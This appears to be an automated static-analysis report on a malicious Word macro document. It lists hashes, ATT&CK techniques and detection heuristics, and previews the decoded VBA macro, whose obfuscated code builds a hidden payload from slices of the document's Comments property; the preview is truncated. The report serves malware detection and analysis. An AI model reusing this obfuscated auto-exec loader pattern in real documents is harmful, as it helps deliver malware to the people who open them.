Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 57794867310c0c67…

MALICIOUS

Office (OLE)

Size: 82.0 KB
Created: 2017-10-11 21:34:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: 1549333bbc2ca45390d73c7876ef7704
SHA-1: 0a456e5f7f7fb43b0d017ec752af986330cceebe
SHA-256: 57794867310c0c673a34eccea666780b09287f8ca42e4c5aadd21abec43d8168
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. This is further supported by the ClamAV detection name 'Doc.Macro.DollarShell-6346616-0', which suggests a known malicious macro pattern. The macro's obfuscated nature and reliance on document properties for payload construction make detailed analysis of its exact execution path difficult, but the intent to execute a secondary payload is clear.

Heuristics (7)

  • ClamAV: Doc.Macro.DollarShell-6346616-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                              | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8969 bytes
SHA-256: d3e3670f64e16c68a203d900ec4afc8e85c6e5370513c10cbb81a6686b82ced3
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub TNIChFsWZ()
HJrXZ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 3371), 50)
mwVljniCj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15168, 13)
ajdfdji = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15104), 197)
QJtIHCn = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 10669), 38)
nBPOwIrvu = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14399, 91)
pozKGjzZb = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7577, 157)
ojoPd = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10894), 6)
djAYUt = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13021), 113)
MjVni = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3604, 173)
OcbJiC = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7831), 114)
OhBfM = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7132), 171)
hiojQqiQ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 3450), 73)
zEXQE = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 2092), 110)
RdRLnUUJFdm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7019, 76)
NBSmBqw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5604, 100)
VjLHClwA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 17139), 133)
tDOiSO = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15897), 151)
hzfRjL = HJrXZ + mwVljniCj + ajdfdji + QJtIHCn + nBPOwIrvu + pozKGjzZb + ojoPd + djAYUt + MjVni + OcbJiC + OhBfM + hiojQqiQ + zEXQE + RdRLnUUJFdm + NBSmBqw + VjLHClwA + tDOiSO
zPzTzXHj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4465, 153)
NJrmGJpL = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 2310), 100)
vDEUalPO = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11233), 186)
NFUQcmucmN = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 12108), 189)
LYfwpNZIt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11656, 46)
SjtKisOIsn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3083, 181)
HobKUO = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5120, 102)
CQOsfpbv = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 14211), 138)
QjXEOuTM = hzfRjL + zPzTzXHj + NJrmGJpL + vDEUalPO + NFUQcmucmN + LYfwpNZIt + SjtKisOIsn + HobKUO + CQOsfpbv
DFtfZn = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5426), 82)
BioRTGD = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4890), 94)
zsmrb = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 17836), 64)
dCzCUYSSQjw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1275, 86)
MocARjzbSD = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 18159, 47)
qTPfYX = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11821), 36)
vCXqzw = Right(Left(ActiveDocument.BuiltInDocume
... (truncated)